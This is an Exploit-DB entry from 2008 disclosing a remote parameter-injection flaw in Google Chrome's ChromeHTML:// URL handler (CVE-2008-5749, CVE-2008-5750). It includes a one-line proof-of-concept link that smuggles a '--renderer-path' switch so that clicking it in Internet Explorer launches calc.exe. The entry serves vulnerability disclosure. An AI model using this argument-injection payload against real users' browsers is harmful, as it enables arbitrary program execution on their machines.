Google Chrome Browser ChromeHTML:// Remote Parameter Injection

ID EDB-ID:7566
Type exploitdb
Reporter Nine:Situations:Group
Modified 2008-12-23T00:00:00


Google Chrome Browser (ChromeHTML://) Remote Parameter Injection. CVE-2008-5749,CVE-2008-5750. Remote exploit for windows platform

Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
tested against: Internet Explorer 8 beta 2, Google Chrome, Microsoft Windows XP SP3
List of command line switches:
Original url:

click the following link with IE while monitoring with procmon
<a href='"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>

# [2008-12-23]